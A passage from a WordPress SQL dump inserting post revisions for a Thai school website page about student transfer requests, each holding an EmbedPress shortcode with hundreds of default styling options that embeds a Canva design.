nftdetail_typography_text_transform=\'false\' nftdetail_typography_font_style=\'false\' nftdetail_typography_text_decoration=\'false\' nftdetail_typography_line_height=\'false\' nftdetail_typography_letter_spacing=\'false\' nftdetail_typography_word_spacing=\'false\' nftdetail_link_color=\'false\' nftdetail_link_typography_typography=\'false\' nftdetail_link_typography_font_family=\'false\' nftdetail_link_typography_font_size=\'false\' nftdetail_link_typography_font_weight=\'false\' nftdetail_link_typography_text_transform=\'false\' nftdetail_link_typography_font_style=\'false\' nftdetail_link_typography_text_decoration=\'false\' nftdetail_link_typography_line_height=\'false\' nftdetail_link_typography_letter_spacing=\'false\' nftdetail_link_typography_word_spacing=\'false\' _title=\'false\' _element_width=\'false\' _element_width_tablet=\'false\' _element_width_mobile=\'false\' _element_custom_width=\'false\' _grid_column=\'false\' _grid_column_custom=\'false\' _grid_row=\'false\' _grid_row_custom=\'false\' _flex_align_self=\'false\' _flex_order=\'false\' _flex_order_custom=\'false\' _flex_size=\'false\' _flex_grow=\'false\' _flex_shrink=\'false\' _element_vertical_align=\'false\' _position=\'false\' _offset_orientation_h=\'false\' _offset_x=\'false\' _offset_x_end=\'false\' _offset_orientation_v=\'false\' _offset_y=\'false\' _offset_y_end=\'false\' _z_index=\'false\' _element_id=\'false\' _css_classes=\'false\' _element_cache=\'false\' _animation=\'false\' _animation_tablet=\'false\' _animation_mobile=\'false\' animation_duration=\'false\' _animation_delay=\'false\' _transform_rotate_popover=\'false\' _transform_rotateZ_effect=\'false\' _transform_rotateZ_effect_tablet=\'false\' _transform_rotateZ_effect_mobile=\'false\' _transform_rotate_3d=\'false\' _transform_rotateX_effect=\'false\' _transform_rotateX_effect_tablet=\'false\' _transform_rotateX_effect_mobile=\'false\' _transform_rotateY_effect=\'false\' _transform_rotateY_effect_tablet=\'false\' _transform_rotateY_effect_mobile=\'false\' _transform_perspective_effect=\'false\' _transform_perspective_effect_tablet=\'false\' _transform_perspective_effect_mobile=\'false\' _transform_translate_popover=\'false\' _transform_translateX_effect=\'false\' _transform_translateX_effect_tablet=\'false\' _transform_translateX_effect_mobile=\'false\' _transform_translateY_effect=\'false\' _transform_translateY_effect_tablet=\'false\' _transform_translateY_effect_mobile=\'false\' _transform_scale_popover=\'false\' _transform_keep_proportions=\'yes\' _transform_scale_effect=\'false\' _transform_scale_effect_tablet=\'false\' _transform_scale_effect_mobile=\'false\' _transform_scaleX_effect=\'false\' _transform_scaleX_effect_tablet=\'false\' _transform_scaleX_effect_mobile=\'false\' _transform_scaleY_effect=\'false\' _transform_scaleY_effect_tablet=\'false\' _transform_scaleY_effect_mobile=\'false\' _transform_skew_popover=\'false\' _transform_skewX_effect=\'false\' _transform_skewX_effect_tablet=\'false\' _transform_skewX_effect_mobile=\'false\' _transform_skewY_effect=\'false\' _transform_skewY_effect_tablet=\'false\' _transform_skewY_effect_mobile=\'false\' _transform_flipX_effect=\'false\' _transform_flipY_effect=\'false\' _transform_rotate_popover_hover=\'false\' _transform_rotateZ_effect_hover=\'false\' _transform_rotateZ_effect_hover_tablet=\'false\' _transform_rotateZ_effect_hover_mobile=\'false\' _transform_rotate_3d_hover=\'false\' _transform_rotateX_effect_hover=\'false\' _transform_rotateX_effect_hover_tablet=\'false\' _transform_rotateX_effect_hover_mobile=\'false\' _transform_rotateY_effect_hover=\'false\' _transform_rotateY_effect_hover_tablet=\'false\' _transform_rotateY_effect_hover_mobile=\'false\' _transform_perspective_effect_hover=\'false\' _transform_perspective_effect_hover_tablet=\'false\' _transform_perspective_effect_hover_mobile=\'false\' _transform_translate_popover_hover=\'false\' _transform_translateX_effect_hover=\'false\' _transform_translateX_effect_hover_tablet=\'false\' _transform_translateX_effect_hover_mobile=\'false\' _transform_translateY_effect_hover=\'false\' _transform_translateY_effect_hover_tablet=\'false\' _transform_translateY_effect_hover_mobile=\'false\' _transform_scale_popover_hover=\'false\' _transform_keep_proportions_hover=\'yes\' _transform_scale_effect_hover=\'false\' _transform_scale_effect_hover_tablet=\'false\' _transform_scale_effect_hover_mobile=\'false\' _transform_scaleX_effect_hover=\'false\' _transform_scaleX_effect_hover_tablet=\'false\' _transform_scaleX_effect_hover_mobile=\'false\' _transform_scaleY_effect_hover=\'false\' _transform_scaleY_effect_hover_tablet=\'false\' _transform_scaleY_effect_hover_mobile=\'false\' _transform_skew_popover_hover=\'false\' _transform_skewX_effect_hover=\'false\' _transform_skewX_effect_hover_tablet=\'false\' _transform_skewX_effect_hover_mobile=\'false\' _transform_skewY_effect_hover=\'false\' _transform_skewY_effect_hover_tablet=\'false\' _transform_skewY_effect_hover_mobile=\'false\' _transform_flipX_effect_hover=\'false\' _transform_flipY_effect_hover=\'false\' motion_fx_transform_x_anchor_point=\'false\' motion_fx_transform_y_anchor_point=\'false\' _background_background=\'false\' _background_color=\'false\' _background_color_stop=\'false\' _background_color_b=\'false\' _background_color_b_stop=\'false\' _background_gradient_type=\'false\' _background_gradient_angle=\'false\' _background_gradient_position=\'false\' _background_image=\'false\' _background_position=\'false\' _background_xpos=\'false\' _background_ypos=\'false\' _background_attachment=\'false\' _background_repeat=\'false\' _background_size=\'false\' _background_bg_width=\'false\' _background_video_link=\'false\' _background_video_start=\'false\' _background_video_end=\'false\' _background_play_once=\'false\' _background_play_on_mobile=\'false\' _background_privacy_mode=\'false\' _background_video_fallback=\'false\' _background_slideshow_gallery=\'false\' _background_slideshow_loop=\'false\' _background_slideshow_slide_duration=\'false\' _background_slideshow_slide_transition=\'false\' _background_slideshow_transition_duration=\'false\' _background_slideshow_background_size=\'false\' _background_slideshow_background_position=\'false\' _background_slideshow_lazyload=\'false\' _background_slideshow_ken_burns=\'false\' _background_slideshow_ken_burns_zoom_direction=\'false\' _background_hover_background=\'false\' _background_hover_color=\'false\' _background_hover_color_stop=\'false\' _background_hover_color_b=\'false\' _background_hover_color_b_stop=\'false\' _background_hover_gradient_type=\'false\' _background_hover_gradient_angle=\'false\' _background_hover_gradient_position=\'false\' _background_hover_image=\'false\' _background_hover_position=\'false\' _background_hover_xpos=\'false\' _background_hover_ypos=\'false\' _background_hover_attachment=\'false\' _background_hover_repeat=\'false\' _background_hover_size=\'false\' _background_hover_bg_width=\'false\' _background_hover_video_link=\'false\' _background_hover_video_start=\'false\' _background_hover_video_end=\'false\' _background_hover_play_once=\'false\' _background_hover_play_on_mobile=\'false\' _background_hover_privacy_mode=\'false\' _background_hover_video_fallback=\'false\' _background_hover_slideshow_gallery=\'false\' _background_hover_slideshow_loop=\'false\' _background_hover_slideshow_slide_duration=\'false\' _background_hover_slideshow_slide_transition=\'false\' _background_hover_slideshow_transition_duration=\'false\' _background_hover_slideshow_background_size=\'false\' _background_hover_slideshow_background_position=\'false\' _background_hover_slideshow_lazyload=\'false\' _background_hover_slideshow_ken_burns=\'false\' _background_hover_slideshow_ken_burns_zoom_direction=\'false\' _border_border=\'false\' _border_width=\'false\' _border_color=\'false\' _box_shadow_box_shadow_type=\'false\' _box_shadow_box_shadow=\'false\' _box_shadow_box_shadow_position=\'false\' _border_hover_border=\'false\' _border_hover_width=\'false\' _border_hover_color=\'false\' _box_shadow_hover_box_shadow_type=\'false\' _box_shadow_hover_box_shadow=\'false\' _box_shadow_hover_box_shadow_position=\'false\' _mask_switch=\'false\' _mask_shape=\'false\' _mask_image=\'false\' _mask_notice=\'false\' _mask_size=\'false\' _mask_size_scale=\'false\' _mask_position=\'false\' _mask_position_x=\'false\' _mask_position_y=\'false\' _mask_repeat=\'false\' hide_desktop=\'false\' hide_tablet=\'false\' hide_mobile=\'false\']https://www.canva.com/design/DAGsEine2O0/Q6Wb_uxvDbumPForlKtMkQ/view[/embedpress]','ยื่นเรื่องย้ายนักเรียน','','inherit','closed','closed','','1623-revision-v1','','','2025-07-03 09:42:26','2025-07-03 02:42:26','',1623,'http://pakhaeng.ssk.in.th/?p=1628',0,'revision','',0);
INSERT INTO `wp_posts` VALUES
(1629,1,'2025-07-03 09:43:31','2025-07-03 02:43:31','[embedpress embedpress_embeded_link=\'https://www.canva.com/design/DAGsEine2O0/Q6Wb_uxvDbumPForlKtMkQ/view\' prefix_nftcreator=\'false\' prefix_nftprice=\'false\' prefix_nftlastsale=\'false\' label_nftbutton=\'false\' loadmorelabel=\'false\' label_nftrank=\'false\' label_nftdetails=\'false\' instafeedFollowBtnLabel=\'false\' instafeedPostsCountText=\'false\' instafeedFollowersCountText=\'false\' instafeedPopupFollowBtnLabel=\'false\' instafeedLoadmoreLabel=\'false\' cPopupButtonText=\'false\' adWidth=\'false\' adHeight=\'false\' adStart=\'false\' adSkipButtonAfter=\'false\' embedpress_protection_message=\'false\' embedpress_lock_content_error_message=\'false\' embedpress_password_placeholder=\'false\' embedpress_submit_button_text=\'false\' embedpress_submit_Unlocking_text=\'false\' embedpress_lock_content_heading=\'false\' embedpress_lock_content_sub_heading=\'false\' embedpress_lock_content_footer_message=\'false\' height=\'519\' embedpress_pro_embeded_source=\'default\' instafeedFeedType=\'false\' instafeedAccountType=\'false\' embedpress_pro_embeded_nft_type=\'false\' embedpress_audio_video_auto_pause=\'false\' spotify_theme=\'false\' emberpress_custom_player=\'false\' custom_payer_preset=\'false\' embedpress_pro_video_start_time=\'false\' embedpress_pro_youtube_end_time=\'false\' embedpress_player_color=\'false\' embedpress_pro_vimeo_auto_play=\'false\' embedpress_pro_vimeo_autopause=\'false\' embedpress_pro_vimeo_dnt=\'false\' embedpress_pro_youtube_auto_play=\'false\' embedpress_pro_youtube_mute=\'false\' embedpress_pro_youtube_display_controls=\'false\' embedpress_pro_youtube_enable_fullscreen_button=\'false\' embedpress_pro_youtube_display_video_annotations=\'false\' embedpress_pro_youtube_progress_bar_color=\'false\' embedpress_pro_youtube_force_closed_captions=\'false\' embedpress_pro_youtube_modest_branding=\'false\' embepress_player_restart=\'false\' embepress_player_rewind=\'false\' embepress_player_fast_forward=\'false\' embepress_player_tooltip=\'false\' embepress_player_hide_controls=\'false\' embepress_player_download=\'false\' embepress_player_always_on_top=\'false\' embedpress_pro_youtube_display_related_videos=\'false\' embedpress_player_poster_thumbnail=\'false\' embedpress_pro_youtube_logo=\'false\' embedpress_pro_youtube_logo_size=\'false\' embedpress_pro_youtube_logo_custom_dimension=\'false\' embedpress_pro_youtube_logo_xpos=\'false\' embedpress_pro_youtube_logo_ypos=\'false\' embedpress_pro_youtube_logo_opacity=\'false\' embedpress_pro_youtube_logo_opacity_hover=\'false\' embedpress_pro_youtube_cta=\'false\' embedpress_pro_vimeo_color=\'false\' embedpress_pro_vimeo_display_title=\'false\' embedpress_pro_vimeo_display_author=\'false\' embedpress_pro_vimeo_avatar=\'false\' embedpress_pro_vimeo_loop=\'false\' embedpress_pro_vimeo_logo=\'false\' embedpress_pro_vimeo_logo_size=\'false\' embedpress_pro_vimeo_logo_custom_dimension=\'false\' embedpress_pro_vimeo_logo_xpos=\'false\' embedpress_pro_vimeo_logo_ypos=\'false\' embedpress_pro_vimeo_logo_opacity=\'false\' embedpress_pro_vimeo_logo_opacity_hover=\'false\' embedpress_pro_vimeo_cta=\'false\' embedpress_pro_wistia_auto_play=\'false\' embedpress_pro_wistia_color=\'false\' embedpress_pro_wistia_fullscreen_button=\'false\' embedpress_pro_wistia_small_play_button=\'false\' embedpress_pro_wistia_captions=\'false\' embedpress_pro_wistia_captions_enabled_by_default=\'false\' embedpress_pro_wistia_playbar=\'false\' embedpress_pro_wistia_volume_control=\'false\' embedpress_pro_wistia_volume=\'false\' embedpress_pro_wistia_logo=\'false\' embedpress_pro_wistia_logo_size=\'false\' embedpress_pro_wistia_logo_custom_dimension=\'false\' embedpress_pro_wistia_logo_xpos=\'false\' embedpress_pro_wistia_logo_ypos=\'false\' embedpress_pro_wistia_logo_opacity=\'false\' embedpress_pro_wistia_logo_opacity_hover=\'false\' embedpress_pro_wistia_cta=\'false\' embedpress_pro_soundcloud_visual=\'false\' embedpress_pro_soundcloud_color=\'false\' embedpress_pro_soundcloud_autoplay=\'false\' embedpress_pro_soundcloud_share_button=\'false\' embedpress_pro_soundcloud_comments=\'false\' embedpress_pro_soundcloud_artwork=\'false\' embedpress_pro_soundcloud_play_count=\'false\' embedpress_pro_soundcloud_user_name=\'false\' embedpress_pro_soundcloud_buy_button=\'false\' embedpress_pro_soundcloud_download_button=\'false\' embedpress_pro_dailymotion_ui_logo=\'false\' embedpress_pro_dailymotion_autoplay=\'false\' embedpress_pro_dailymotion_play_on_mobile=\'false\' embedpress_pro_dailymotion_mute=\'false\' embedpress_pro_dailymotion_player_control=\'false\' embedpress_pro_dailymotion_video_info=\'false\' embedpress_pro_dailymotion_control_color=\'false\' embedpress_pro_dailymotion_logo=\'false\' embedpress_pro_dailymotion_logo_size=\'false\' embedpress_pro_dailymotion_logo_custom_dimension=\'false\' embedpress_pro_dailymotion_logo_xpos=\'false\' embedpress_pro_dailymotion_logo_ypos=\'false\' embedpress_pro_dailymotion_logo_opacity=\'false\' embedpress_pro_dailymotion_logo_opacity_hover=\'false\' embedpress_pro_dailymotion_cta=\'false\' embedpress_pro_twitch_autoplay=\'false\' embedpress_pro_fs=\'false\' embedpress_pro_twitch_chat=\'false\' embedpress_pro_twitch_mute=\'false\' embedpress_pro_twitch_theme=\'false\' embedpress_pro_twitch_logo=\'false\' embedpress_pro_twitch_logo_size=\'false\' embedpress_pro_twitch_logo_custom_dimension=\'false\' embedpress_pro_twitch_logo_xpos=\'false\' embedpress_pro_twitch_logo_ypos=\'false\' embedpress_pro_twitch_logo_opacity=\'false\' embedpress_pro_twitch_logo_opacity_hover=\'false\' embedpress_pro_twitch_cta=\'false\' limit=\'false\' orderby=\'false\' ytChannelLayout=\'false\' pagesize=\'false\' columns=\'false\' gapbetweenvideos=\'false\' pagination=\'false\' yt_sub_channel=\'false\' yt_sub_text=\'false\' yt_sub_layout=\'false\' yt_sub_theme=\'false\' yt_sub_count=\'false\' yt_lc_show=\'false\' layout=\'false\' preset=\'false\' nftperrow=\'false\' gapbetweenitem=\'false\' collectionname=\'false\' nftimage=\'false\' nfttitle=\'false\' nftcreator=\'false\' nftprice=\'false\' nftlastsale=\'false\' nftbutton=\'false\' loadmore=\'false\' itemperpage=\'false\' nftrank=\'false\' nftdetails=\'false\' instafeedProfileImage=\'false\' instafeedProfileImageUrl=\'false\' instafeedFollowBtn=\'false\' instafeedPostsCount=\'false\' instafeedFollowersCount=\'false\' instafeedAccName=\'false\' instaLayout=\'false\' instafeedColumns=\'false\' instafeedColumnsGap=\'false\' embedpress_instafeed_slide_show=\'false\' embedpress_carousel_autoplay=\'false\' embedpress_carousel_autoplay_speed=\'false\' embedpress_carousel_transition_speed=\'false\' embedpress_carousel_loop=\'false\' embedpress_carousel_arrows=\'false\' embedpress_carousel_spacing=\'false\' instafeedPostsPerPage=\'false\' instafeedTab=\'false\' instafeedLikesCount=\'false\' instafeedCommentsCount=\'false\' instafeedPopup=\'false\' instafeedPopupFollowBtn=\'false\' instafeedLoadmore=\'false\' cEmbedType=\'false\' cPopupButtonTextColor=\'false\' cPopupButtonBGColor=\'false\' calendlyData=\'false\' hideCookieBanner=\'false\' hideEventTypeDetails=\'false\' cBackgroundColor=\'false\' cTextColor=\'false\' cButtonLinkColor=\'false\' theme=\'false\' color=\'false\' coverImageUrl=\'false\' hideDownload=\'false\' playlist=\'false\' playlistContinuous=\'false\' playlistLoop=\'false\' playlistAutoupdate=\'false\' hidePlaylistDescriptions=\'false\' hidePlaylistImages=\'false\' episodeImagePosition=\'false\' showChaptersImage=\'false\' hideLikes=\'false\' hideComments=\'false\' hideSharing=\'false\' hideLogo=\'false\' hideEpisodeDescription=\'false\' mode=\'false\' playerAutoplay=\'false\' delay=\'false\' repeat=\'false\' backgroundColor=\'false\' expiration=\'false\' adManager=\'false\' adSource=\'false\' adFileUrl=\'false\' adFileUrl1=\'false\' adXPosition=\'false\' adYPosition=\'false\' adUrl=\'false\' adSkipButton=\'false\' embedpress_lock_content=\'false\' embedpress_protection_type=\'false\' embedpress_select_roles=\'false\' embedpress_lock_content_password=\'false\' embedpress_enable_footer_message=\'false\' embedpress_content_share=\'false\' embedpress_content_share_position=\'false\' embedpress_content_title=\'false\' embedpress_content_descripiton=\'false\' embedpress_content_share_custom_thumbnail=\'false\' embedpress_share_facebook=\'false\' embedpress_share_twitter=\'false\' embedpress_share_pinterest=\'false\' embedpress_share_linkedin=\'false\' width=\'1200\' align=\'false\' align_tablet=\'false\' align_mobile=\'false\' nft_item_background_color=\'false\' nft_collectionname_color=\'false\' nft_collectionname_hover_color=\'false\' nft_collectionname_typography_typography=\'false\' nft_collectionname_typography_font_family=\'false\' nft_collectionname_typography_font_size=\'false\' nft_collectionname_typography_font_weight=\'false\' nft_collectionname_typography_text_transform=\'false\' nft_collectionname_typography_font_style=\'false\' nft_collectionname_typography_text_decoration=\'false\' nft_collectionname_typography_line_height=\'false\' nft_collectionname_typography_letter_spacing=\'false\' nft_collectionname_typography_word_spacing=\'false\' nft_title_color=\'false\' nft_title_typography_typography=\'false\' nft_title_typography_font_family=\'false\' nft_title_typography_font_size=\'false\' nft_title_typography_font_weight=\'false\' nft_title_typography_text_transform=\'false\' nft_title_typography_font_style=\'false\' nft_title_typography_text_decoration=\'false\' nft_title_typography_line_height=\'false\' nft_title_typography_letter_spacing=\'false\' nft_title_typography_word_spacing=\'false\' nft_creator_color=\'false\' nft_creator_typography_typography=\'false\' nft_creator_typography_font_family=\'false\' nft_creator_typography_font_size=\'false\' nft_creator_typography_font_weight=\'false\' nft_creator_typography_text_transform=\'false\' nft_creator_typography_font_style=\'false\' nft_creator_typography_text_decoration=\'false\' nft_creator_typography_line_height=\'false\' nft_creator_typography_letter_spacing=\'false\' nft_creator_typography_word_spacing=\'false\' nft_created_by_color=\'false\' nft_created_by_typography_typography=\'false\' nft_created_by_typography_font_family=\'false\' nft_created_by_typography_font_size=\'false\' nft_created_by_typography_font_weight=\'false\' nft_created_by_typography_text_transform=\'false\' nft_created_by_typography_font_style=\'false\' nft_created_by_typography_text_decoration=\'false\' nft_created_by_typography_line_height=\'false\' nft_created_by_typography_letter_spacing=\'false\' nft_created_by_typography_word_spacing=\'false\' nft_price_color=\'false\' nft_price_typography_typography=\'false\' nft_price_typography_font_family=\'false\' nft_price_typography_font_size=\'false\' nft_price_typography_font_weight=\'false\' nft_price_typography_text_transform=\'false\' nft_price_typography_font_style=\'false\' nft_price_typography_text_decoration=\'false\' nft_price_typography_line_height=\'false\' nft_price_typography_letter_spacing=\'false\' nft_price_typography_word_spacing=\'false\' nft_last_sale_color=\'false\' nft_last_sale_typography_typography=\'false\' nft_last_sale_typography_font_family=\'false\' nft_last_sale_typography_font_size=\'false\' nft_last_sale_typography_font_weight=\'false\' nft_last_sale_typography_text_transform=\'false\' nft_last_sale_typography_font_style=\'false\' nft_last_sale_typography_text_decoration=\'false\' nft_last_sale_typography_line_height=\'false\' nft_last_sale_typography_letter_spacing=\'false\' nft_last_sale_typography_word_spacing=\'false\' nftbutton_color=\'false\' nftbutton_bg_color=\'false\' nftbutton_typography_typography=\'false\' nftbutton_typography_font_family=\'false\' nftbutton_typography_font_size=\'false\' nftbutton_typography_font_weight=\'false\' nftbutton_typography_text_transform=\'false\' nftbutton_typography_font_style=\'false\' nftbutton_typography_text_decoration=\'false\' nftbutton_typography_line_height=\'false\' nftbutton_typography_letter_spacing=\'false\' nftbutton_typography_word_spacing=\'false\' nft_loadmore_color=\'false\' nft_loadmore_typography_typography=\'false\' nft_loadmore_typography_font_family=\'false\' nft_loadmore_typography_font_size=\'false\' nft_loadmore_typography_font_weight=\'false\' nft_loadmore_typography_text_transform=\'false\' nft_loadmore_typography_font_style=\'false\' nft_loadmore_typography_text_decoration=\'false\' nft_loadmore_typography_line_height=\'false\' nft_loadmore_typography_letter_spacing=\'false\' nft_loadmore_typography_word_spacing=\'false\' nft_loadmore_bgcolor=\'false\' nftrank_label_color=\'false\' nftrank_label_typography_typography=\'false\' nftrank_label_typography_font_family=\'false\' nftrank_label_typography_font_size=\'false\' nftrank_label_typography_font_weight=\'false\' nftrank_label_typography_text_transform=\'false\' nftrank_label_typography_font_style=\'false\' nftrank_label_typography_text_decoration=\'false\' nftrank_label_typography_line_height=\'false\' nftrank_label_typography_letter_spacing=\'false\' nftrank_label_typography_word_spacing=\'false\' nftrank_color=\'false\' nftrank_border_color=\'false\' nftrank_typography_typography=\'false\' nftrank_typography_font_family=\'false\' nftrank_typography_font_size=\'false\' nftrank_typography_font_weight=\'false\' nftrank_typography_text_transform=\'false\' nftrank_typography_font_style=\'false\' nftrank_typography_text_decoration=\'false\' nftrank_typography_line_height=\'false\' nftrank_typography_letter_spacing=\'false\' nftrank_typography_word_spacing=\'false\' nftdetail_title_color=\'false\' nftdetail_title_typography_typography=\'false\' nftdetail_title_typography_font_family=\'false\' nftdetail_title_typography_font_size=\'false\' nftdetail_title_typography_font_weight=\'false\' nftdetail_title_typography_text_transform=\'false\' nftdetail_title_typography_font_style=\'false\' nftdetail_title_typography_text_decoration=\'false\' nftdetail_title_typography_line_height=\'false\' nftdetail_title_typography_letter_spacing=\'false\' nftdetail_title_typography_word_spacing=\'false\' nftdetail_color=\'false\' nftdetail_typography_typography=\'false\' nftdetail_typography_font_family=\'false\' nftdetail_typography_font_size=\'false\' nftdetail_typography_font_weight=\'false\' nftdetail_typography_text_transform=\'false\' nftdetail_typography_font_style=\'false\' nftdetail_typography_text_decoration=\'false\' nftdetail_typography_line_height=\'false\' nftdetail_typography_letter_spacing=\'false\' nftdetail_typography_word_spacing=\'false\' nftdetail_link_color=\'false\' nftdetail_link_typography_typography=\'false\' nftdetail_link_typography_font_family=\'false\' nftdetail_link_typography_font_size=\'false\' nftdetail_link_typography_font_weight=\'false\' nftdetail_link_typography_text_transform=\'false\' nftdetail_link_typography_font_style=\'false\' nftdetail_link_typography_text_decoration=\'false\' nftdetail_link_typography_line_height=\'false\' nftdetail_link_typography_letter_spacing=\'false\' nftdetail_link_typography_word_spacing=\'false\' _title=\'false\' _element_width=\'false\' _element_width_tablet=\'false\' _element_width_mobile=\'false\' _element_custom_width=\'false\' _grid_column=\'false\' _grid_column_custom=\'false\' _grid_row=\'false\' _grid_row_custom=\'false\' _flex_align_self=\'false\' _flex_order=\'false\' _flex_order_custom=\'false\' _flex_size=\'false\' _flex_grow=\'false\' _flex_shrink=\'false\' _element_vertical_align=\'false\' _position=\'false\' _offset_orientation_h=\'false\' _offset_x=\'false\' _offset_x_end=\'false\' _offset_orientation_v=\'false\' _offset_y=\'false\' _offset_y_end=\'false\' _z_index=\'false\' _element_id=\'false\' _css_classes=\'false\' _element_cache=\'false\' _animation=\'false\' _animation_tablet=\'false\' _animation_mobile=\'false\' animation_duration=\'false\' _animation_delay=\'false\' _transform_rotate_popover=\'false\' _transform_rotateZ_effect=\'false\' _transform_rotateZ_effect_tablet=\'false\' _transform_rotateZ_effect_mobile=\'false\' _transform_rotate_3d=\'false\' _transform_rotateX_effect=\'false\' _transform_rotateX_effect_tablet=\'false\' _transform_rotateX_effect_mobile=\'false\' _transform_rotateY_effect=\'false\' _transform_rotateY_effect_tablet=\'false\' _transform_rotateY_effect_mobile=\'false\' _transform_perspective_effect=\'false\' _transform_perspective_effect_tablet=\'false\' _transform_perspective_effect_mobile=\'false\' _transform_translate_popover=\'false\' _transform_translateX_effect=\'false\' _transform_translateX_effect_tablet=\'false\' _transform_translateX_effect_mobile=\'false\' _transform_translateY_effect=\'false\' _transform_translateY_effect_tablet=\'false\' _transform_translateY_effect_mobile=\'false\' _transform_scale_popover=\'false\' _transform_keep_proportions=\'yes\' _transform_scale_effect=\'false\' _transform_scale_effect_tablet=\'false\' _transform_scale_effect_mobile=\'false\' _transform_scaleX_effect=\'false\' _transform_scaleX_effect_tablet=\'false\' _transform_scaleX_effect_mobile=\'false\' _transform_scaleY_effect=\'false\' _transform_scaleY_effect_tablet=\'false\' _transform_scaleY_effect_mobile=\'false\' _transform_skew_popover=\'false\' _transform_skewX_effect=\'false\' _transform_skewX_effect_tablet=\'false\' _transform_skewX_effect_mobile=\'false\' _transform_skewY_effect=\'false\' _transform_skewY_effect_tablet=\'false\' _transform_skewY_effect_mobile=\'false\' _transform_flipX_effect=\'false\' _transform_flipY_effect=\'false\' _transform_rotate_popover_hover=\'false\' _transform_rotateZ_effect_hover=\'false\' _transform_rotateZ_effect_hover_tablet=\'false\' _transform_rotateZ_effect_hover_mobile=\'false\' _transform_rotate_3d_hover=\'false\' _transform_rotateX_effect_hover=\'false\' _transform_rotateX_effect_hover_tablet=\'false\' _transform_rotateX_effect_hover_mobile=\'false\' _transform_rotateY_effect_hover=\'false\' _transform_rotateY_effect_hover_tablet=\'false\' _transform_rotateY_effect_hover_mobile=\'false\' _transform_perspective_effect_hover=\'false\' _transform_perspective_effect_hover_tablet=\'false\' _transform_perspective_effect_hover_mobile=\'false\' _transform_translate_popover_hover=\'false\' _transform_translateX_effect_hover=\'false\' _transform_translateX_effect_hover_tablet=\'false\' _transform_translateX_effect_hover_mobile=\'false\' _transform_translateY_effect_hover=\'false\' _transform_translateY_effect_hover_tablet=\'false\' _transform_translateY_effect_hover_mobile=\'false\' _transform_scale_popover_hover=\'false\' _transform_keep_proportions_hover=\'yes\' _transform_scale_effect_hover=\'false\' _transform_scale_effect_hover_tablet=\'false\' _transform_scale_effect_hover_mobile=\'false\' _transform_scaleX_effect_hover=\'false\' _transform_scaleX_effect_hover_tablet=\'false\' _transform_scaleX_effect_hover_mobile=\'false\' _transform_scaleY_effect_hover=\'false\' _transform_scaleY_effect_hover_tablet=\'false\' _transform_scaleY_effect_hover_mobile=\'false\' _transform_skew_popover_hover=\'false\' _transform_skewX_effect_hover=\'false\' _transform_skewX_effect_hover_tablet=\'false\' _transform_skewX_effect_hover_mobile=\'false\' _transform_skewY_effect_hover=\'false\' _transform_skewY_effect_hover_tablet=\'false\' _transform_skewY_effect_hover_mobile=\'false\' _transform_flipX_effect_hover=\'false\' _transform_flipY_effect_hover=\'false\' motion_fx_transform_x_anchor_point=\'false\' motion_fx_transform_y_anchor_point=\'false\' _background_background=\'false\' _background_color=\'false\' _background_color_stop=\'false\' _background_color_b=\'false\' _background_color_b_stop=\'false\' _background_gradient_type=\'false\' _background_gradient_angle=\'false\' _background_gradient_position=\'false\' _background_image=\'false\' _background_position=\'false\' _background_xpos=\'false\' _background_ypos=\'false\' _background_attachment=\'false\' _background_repeat=\'false\' _background_size=\'false\' _background_bg_width=\'false\' _background_video_link=\'false\' _background_video_start=\'false\' _background_video_end=\'false\' _background_play_once=\'false\' _background_play_on_mobile=\'false\' _background_privacy_mode=\'false\' _background_video_fallback=\'false\' _background_slideshow_gallery=\'false\' _background_slideshow_loop=\'false\' _background_slideshow_slide_duration=\'false\' _background_slideshow_slide_transition=\'false\' _background_slideshow_transition_duration=\'false\' _background_slideshow_background_size=\'false\' _background_slideshow_background_position=\'false\' _background_slideshow_lazyload=\'false\' _background_slideshow_ken_burns=\'false\' _background_slideshow_ken_burns_zoom_direction=\'false\' _background_hover_background=\'false\' _background_hover_color=\'false\' _background_hover_color_stop=\'false\' _background_hover_color_b=\'false\' _background_hover_color_b_stop=\'false\' _background_hover_gradient_type=\'false\' _background_hover_gradient_angle=\'false\' _background_hover_gradient_position=\'false\' _background_hover_image=\'false\' _background_hover_position=\'false\' _background_hover_xpos=\'false\' _background_hover_ypos=\'false\' _background_hover_attachment=\'false\' _background_hover_repeat=\'false\' _background_hover_size=\'false\' _background_hover_bg_width=\'false\' _background_hover_video_link=\'false\' _background_hover_video_start=\'false\' _background_hover_video_end=\'false\' _background_hover_play_once=\'false\' _background_hover_play_on_mobile=\'false\' _background_hover_privacy_mode=\'false\' _background_hover_video_fallback=\'false\' _background_hover_slideshow_gallery=\'false\' _background_hover_slideshow_loop=\'false\' _background_hover_slideshow_slide_duration=\'false\' _background_hover_slideshow_slide_transition=\'false\' _background_hover_slideshow_transition_duration=\'false\' _background_hover_slideshow_background_size=\'false\' _background_hover_slideshow_background_position=\'false\' _background_hover_slideshow_lazyload=\'false\' _background_hover_slideshow_ken_burns=\'false\' _background_hover_slideshow_ken_burns_zoom_direction=\'false\' _border_border=\'false\' _border_width=\'false\' _border_color=\'false\' _box_shadow_box_shadow_type=\'false\' _box_shadow_box_shadow=\'false\' _box_shadow_box_shadow_position=\'false\' _border_hover_border=\'false\' _border_hover_width=\'false\' _border_hover_color=\'false\' _box_shadow_hover_box_shadow_type=\'false\' _box_shadow_hover_box_shadow=\'false\' _box_shadow_hover_box_shadow_position=\'false\' _mask_switch=\'false\' _mask_shape=\'false\' _mask_image=\'false\' _mask_notice=\'false\' _mask_size=\'false\' _mask_size_scale=\'false\' _mask_position=\'false\' _mask_position_x=\'false\' _mask_position_y=\'false\' _mask_repeat=\'false\' hide_desktop=\'false\' hide_tablet=\'false\' hide_mobile=\'false\']https://www.canva.com/design/DAGsEine2O0/Q6Wb_uxvDbumPForlKtMkQ/view[/embedpress]','ยื่นเรื่องย้ายนักเรียน','','inherit','closed','closed','','1623-revision-v1','','','2025-07-03 09:43:31','2025-07-03 02:43:31','',1623,'http://pakhaeng.ssk.in.th/?p=1629',0,'revision','',0),
